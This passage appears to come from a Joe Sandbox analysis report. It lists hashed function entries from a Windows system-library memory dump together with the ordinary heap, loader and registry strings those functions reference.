                                                • Instruction Fuzzy Hash: 5C51FD35E10729EFFB05CB65CD58BADBBB4BF04358F60402AE51193290EB789905DBD1
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                 • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID:
                                                • API String ID: 3446177414-0
                                                • Opcode ID: 93eb06a58c5aaf5eeb9c1bd33a6d99184759e5bd8585aceff21d738813e1b941
                                                • Instruction ID: d8eca9275627ae753c709754bf413dab0ad32f619b891995ebff4e52425413b7
                                                • Opcode Fuzzy Hash: 93eb06a58c5aaf5eeb9c1bd33a6d99184759e5bd8585aceff21d738813e1b941
                                                • Instruction Fuzzy Hash: 09518A35A01756AFDB05CF65CC84F9ABBB6FF88314F284065E91597790CB30AD14CBA1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                 • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                • API String ID: 0-3178619729
                                                • Opcode ID: 1ec9ff8f994316b911fa5a4a21a171e76a310f27126292caa8dba86f992c01be
                                                • Instruction ID: 42b41727f3be2099724a0e911b465463d7735592c0d2b73383faacf458e79718
                                                • Opcode Fuzzy Hash: 1ec9ff8f994316b911fa5a4a21a171e76a310f27126292caa8dba86f992c01be
                                                • Instruction Fuzzy Hash: DF2214B4A00389DFEB05CF26C850B6ABBF5FF05704F248499E585DB281DB35E895CBA1
                                                Strings
                                                • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 36D61728
                                                • HEAP: , xrefs: 36D61596
                                                • HEAP[%wZ]: , xrefs: 36D61712
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                 • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                • API String ID: 0-3178619729
                                                • Opcode ID: 86862b321b20bb59a892494ec8e02575f7b3530cbd0382d33d3d40e4980fcc59
                                                • Instruction ID: 0869e5d80a756d3bb20cfe0fb3227472e482f2b89afe79559cb70f508c0fb27f
                                                • Opcode Fuzzy Hash: 86862b321b20bb59a892494ec8e02575f7b3530cbd0382d33d3d40e4980fcc59
                                                • Instruction Fuzzy Hash: 24E1EF74A043519FEB15CF6EC891B7ABBF1AF48308F948459E9D6CB285DB34E844CB90
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                 • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                • API String ID: 0-1145731471
                                                • Opcode ID: fa82ca3083be5f47f53fb515d2396e367c87ecf5586277bb84928d3a3804b0eb
                                                • Instruction ID: 62627780cdda25af1859a9e49ac8b5c0c30a7366ad6c24b8bc47e96fee69d17b
                                                • Opcode Fuzzy Hash: fa82ca3083be5f47f53fb515d2396e367c87ecf5586277bb84928d3a3804b0eb
                                                • Instruction Fuzzy Hash: C8B1BC79E147598FEB15CF6AC880F9EB7B2AF44398F654429E851EB784D730E840CB60
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                 • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                • API String ID: 0-2391371766
                                                • Opcode ID: 80c7f827a61bf8423ef1b3393bd6a8fa952c68c8874ad50b884f10938e0af055
                                                • Instruction ID: ead7097f025174bf0ffa17582ac75ee21f451c49b8078eb0600d4677efc85565
                                                • Opcode Fuzzy Hash: 80c7f827a61bf8423ef1b3393bd6a8fa952c68c8874ad50b884f10938e0af055
                                                • Instruction Fuzzy Hash: FCB1E1B1A48341AFE711DF55CC80F6BB7E8FB44754F421929FA40ABA50C774E858CBA2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                 • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                • API String ID: 0-318774311
                                                • Opcode ID: 3b8f079097c31c2dcc056b7c9c7679ab5839a46012590f61e0da56d37bf7efae
                                                • Instruction ID: da16580ab9003d17ef4fee96eb93c7387bd3aefe7fdc6b57975ec9f9bcf5f224
                                                • Opcode Fuzzy Hash: 3b8f079097c31c2dcc056b7c9c7679ab5839a46012590f61e0da56d37bf7efae
                                                • Instruction Fuzzy Hash: 05818DB5A18340AFE311CF25C840B6AB7E8EF84794F470929F9809B790DB75D904CBA2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                 • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Objects=%4u$Objects>%4u$VirtualAlloc
                                                • API String ID: 0-3870751728
                                                • Opcode ID: c54c767c83c6ae0a03f358a82dfa64fda25aaf41db5bf3bb5a5931e555377647
                                                • Instruction ID: 5a05426b0594ca9251e31797d99290ce33637ede138b36b1201926bf6a398cca
                                                • Opcode Fuzzy Hash: c54c767c83c6ae0a03f358a82dfa64fda25aaf41db5bf3bb5a5931e555377647
                                                • Instruction Fuzzy Hash: CE916EB4E002159FEB54CF69C884BADBBF1FF48314F24816AD905AB391E7759841CFA0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                • API String ID: 0-373624363
                                                • Opcode ID: 2efb502d3ed1246135cf2a84d2fd1a93098c1a7f0a04ccb69483f92607b52eda
                                                • Instruction ID: f966312074b8d410ce98403a96ab7927840a405cc8f9f8992f55a8e578be1555
                                                • Opcode Fuzzy Hash: 2efb502d3ed1246135cf2a84d2fd1a93098c1a7f0a04ccb69483f92607b52eda
                                                • Instruction Fuzzy Hash: 0A91DEB5E04359CFEB11CF96C880BEE77B0FF05368FA14195E850AB290D7789A91CB91
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: %$&$@
                                                • API String ID: 0-1537733988
                                                • Opcode ID: 9cff8de2d87ea6da05bc5b8efefabadc27e4462ecc68a0d93a6a5f0347a07b92
                                                • Instruction ID: 3b608fbb692239c7b862de5fb208c7d236e996e1f89d543a5715c2cba883f715
                                                • Opcode Fuzzy Hash: 9cff8de2d87ea6da05bc5b8efefabadc27e4462ecc68a0d93a6a5f0347a07b92
                                                • Instruction Fuzzy Hash: 9171D174A083019FE714DF25C980A8BBBE9FF89758F64491DE49A5B290D730D909CBA3
                                                Strings
                                                • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 36E3B82A
                                                • TargetNtPath, xrefs: 36E3B82F
                                                • GlobalizationUserSettings, xrefs: 36E3B834
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                • API String ID: 0-505981995
                                                • Opcode ID: 9575a88f7d9f5596ea0c5c7d95ac858adfff6245be513ce736802d0c5002f1e0
                                                • Instruction ID: 2fcaeb40abc666ca7598dce308baaf6b67c6a969ec0315a6551da6a2d1320a17
                                                • Opcode Fuzzy Hash: 9575a88f7d9f5596ea0c5c7d95ac858adfff6245be513ce736802d0c5002f1e0
                                                • Instruction Fuzzy Hash: D461AE72D02228AFDB21DF55CC88BDAB7B8EF24754F5101E5A509A7250CB74DE88CFA1
                                                Strings
                                                • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 36DBE6C6
                                                • HEAP: , xrefs: 36DBE6B3
                                                • HEAP[%wZ]: , xrefs: 36DBE6A6
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                • API String ID: 0-1340214556
                                                • Opcode ID: 9e787b834025073dda109273c2677d9df5f0b6db9d65c11633dc3e586cc38776
                                                • Instruction ID: bcebe3fea5d0fdea06a8b73e9f7981e3c910205e8406b0555c980b49cc43b9fc
                                                • Opcode Fuzzy Hash: 9e787b834025073dda109273c2677d9df5f0b6db9d65c11633dc3e586cc38776
                                                • Instruction Fuzzy Hash: 40510575600744EFEB12CB65C984F9ABBF8FF05344F1104A4E6818FA92D734E904CBA2
                                                Strings
                                                • minkernel\ntdll\ldrmap.c, xrefs: 36DCA59A
                                                • LdrpCompleteMapModule, xrefs: 36DCA590
                                                • Could not validate the crypto signature for DLL %wZ, xrefs: 36DCA589
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                • API String ID: 0-1676968949
                                                • Opcode ID: 324a6f885efd7e2671936bf8d96fb45d141fe32cc4229afd610c1d635b7c15d5
                                                • Instruction ID: d58dc6a8940dd94c1af776294516f7e3e1411bbbd35941d41dbc1d95ff0e8304
                                                • Opcode Fuzzy Hash: 324a6f885efd7e2671936bf8d96fb45d141fe32cc4229afd610c1d635b7c15d5
                                                • Instruction Fuzzy Hash: 56513378A00B4A9BF711CB19CD49B5A7BF4EF00718F1842A4E9909B6E1DB74E804CBC1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                • API String ID: 0-1151232445
                                                • Opcode ID: ad7678edd37b018d6fa5331abeaa612f850c219dafe6f302f5588933fe6828ab
                                                • Instruction ID: f5477cc90a2679baf01363cfe5307571c57d06e4b61537a0f01bcfcd72df4506
                                                • Opcode Fuzzy Hash: ad7678edd37b018d6fa5331abeaa612f850c219dafe6f302f5588933fe6828ab
                                                • Instruction Fuzzy Hash: 624117B8A10340CFFF15CB1AC4947A97BE1DF05384F794069E6864FA4ADBB4D489CB91
                                                Strings
                                                • LdrpAllocateTls, xrefs: 36DD1B40
                                                • minkernel\ntdll\ldrtls.c, xrefs: 36DD1B4A
                                                • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 36DD1B39
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                • API String ID: 0-4274184382
                                                • Opcode ID: f429a09d7eaa4b1952f18ff4f6a0b81d64603258e10cf7e2621a8fcf25118fe5
                                                • Instruction ID: d7ba8236b0c14b6fd38b617313226ed21cc3c7dc22e89d4f1b4fa8cbdd8f8cb5
                                                • Opcode Fuzzy Hash: f429a09d7eaa4b1952f18ff4f6a0b81d64603258e10cf7e2621a8fcf25118fe5
                                                • Instruction Fuzzy Hash: 404186B5E01609EFDB15CFAACC40AAEBBF6FF48704F518119E505A7250EB35A805CBA1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Leaked Block 0x%p size 0x%p (stack %p depth %u)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-964947082
                                                • Opcode ID: 75533116b4a891cf8e15ca52fb181baf3a622f0d8d4b9d462277cbcbf5094b2e
                                                • Instruction ID: 67ac2e12554edb7874959ace2ceeed1631cee77856e9728aa0f5fba2183831bd
                                                • Opcode Fuzzy Hash: 75533116b4a891cf8e15ca52fb181baf3a622f0d8d4b9d462277cbcbf5094b2e
                                                • Instruction Fuzzy Hash: 5D41BFF6A12254EFEB11DF55C980E6A3BB9EF04308F60446AEB219B350DA30C85DDF61
                                                Strings
                                                • RtlCreateActivationContext, xrefs: 36DD29F9
                                                • Actx , xrefs: 36D933AC
                                                • SXS: %s() passed the empty activation context data, xrefs: 36DD29FE
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                • API String ID: 0-859632880
                                                • Opcode ID: 5ad2bd46ef62c87fe83b7028feb012ef4e128174562d8f7d3cf90773957cb936
                                                • Instruction ID: ff51f317a5dbb09268b9458f1a345a8a470a7476193fd9ddb83eaa932ebfcb5b
                                                • Opcode Fuzzy Hash: 5ad2bd46ef62c87fe83b7028feb012ef4e128174562d8f7d3cf90773957cb936
                                                • Instruction Fuzzy Hash: 57312F32A40315AFEB12DF69C880F9A77E4EF48B24F124469EE04DF681CB31D845CBA0
                                                Strings
                                                • @, xrefs: 36DEB670
                                                • GlobalFlag, xrefs: 36DEB68F
                                                • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 36DEB632
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                • API String ID: 0-4192008846
                                                • Opcode ID: e8d713c6eadd309c48266eb0e1c8fe77c0100cd2ed6fe853368c96105babc113
                                                • Instruction ID: 4a289223c669449439e4e9e733bd8f7f54531e4d5931ca9369b5bce73567c68c
                                                • Opcode Fuzzy Hash: e8d713c6eadd309c48266eb0e1c8fe77c0100cd2ed6fe853368c96105babc113
                                                • Instruction Fuzzy Hash: 7B315DB5D01219AFDB00EFA6DD80AEFBBB8EF44744F500469E605AB150D774EE04CBA5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$OsBootstatPath$\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control
                                                • API String ID: 0-1050206962
                                                • Opcode ID: 51b12913d983b60f8c15ab8c6c1ef91248e055af7e0073729c4cc12950a8435f
                                                • Instruction ID: 7e015b1160d5a5a241ec1c3783871c902298feb52827c0422fc120945c45635e
                                                • Opcode Fuzzy Hash: 51b12913d983b60f8c15ab8c6c1ef91248e055af7e0073729c4cc12950a8435f
                                                • Instruction Fuzzy Hash: A5318076D00619BFEB01DFD6CC80EEEBBBDEB44658F450465E900A7220D738DD098BA2
                                                Strings
                                                • LdrpInitializeTls, xrefs: 36DD1A47
                                                • DLL "%wZ" has TLS information at %p, xrefs: 36DD1A40
                                                • minkernel\ntdll\ldrtls.c, xrefs: 36DD1A51
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                • API String ID: 0-931879808
                                                • Opcode ID: 8ce455bc040ead84501eaa6fa5cd22a952351b594482e55a6db26076fe9c78aa
                                                • Instruction ID: 94cad39837c4649becfa35d3962f0f1708ccb818449372275add640744e9713d
                                                • Opcode Fuzzy Hash: 8ce455bc040ead84501eaa6fa5cd22a952351b594482e55a6db26076fe9c78aa
                                                • Instruction Fuzzy Hash: 23319C72E10214EBF7149B59CC85FAA7BB9AB40798F550159E600BB280DB70FD49CBE1
                                                Strings
                                                • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 36DA127B
                                                • BuildLabEx, xrefs: 36DA130F
                                                • @, xrefs: 36DA12A5
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                • API String ID: 0-3051831665
                                                • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                • Instruction ID: bbd3f35145f5322e83590079a9cf584c0631f6bea779d96b16855066a50bb88d
                                                • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                • Instruction Fuzzy Hash: EC319F72904719AFDB11DF96CC40EEFBBB9EF84760F004425E914A7660DB30DA05DBA1
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: RtlValidateHeap
                                                • API String ID: 3446177414-1797218451
                                                • Opcode ID: 420c332dbfe3fbff0e857faa33b9848cf8899f83c7e8da2b1ea758a7542c0465
                                                • Instruction ID: 142323c28be8a223d663c04f728dc1c0eccbde38576812b1eef8af81ee0b5140
                                                • Opcode Fuzzy Hash: 420c332dbfe3fbff0e857faa33b9848cf8899f83c7e8da2b1ea758a7542c0465
                                                • Instruction Fuzzy Hash: 12413476B013559FEF02CF64C8847BEBBB2FF40254F298259E5529B684CB349905CBA1
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: kLsE
                                                • API String ID: 3446177414-3058123920
                                                • Opcode ID: be770fba12b587c6010726680d113aa977e8fe16445a22ceacd3b0c850dc4449
                                                • Instruction ID: 79e30a3045bbdf0fcffda9b8fd5f9b4c921d3073812a6e760fcb5e017897d358
                                                • Opcode Fuzzy Hash: be770fba12b587c6010726680d113aa977e8fe16445a22ceacd3b0c850dc4449
                                                • Instruction Fuzzy Hash: 4C417C729123418BEB159B73CC487653B96A700758F600618EF506B0D1C7B4C49FDFE2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$@
                                                APIs
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID:
                                                Strings
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: $$$
                                                Strings
                                                Similarity
                                                • API ID:
                                                • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                Strings
                                                Similarity
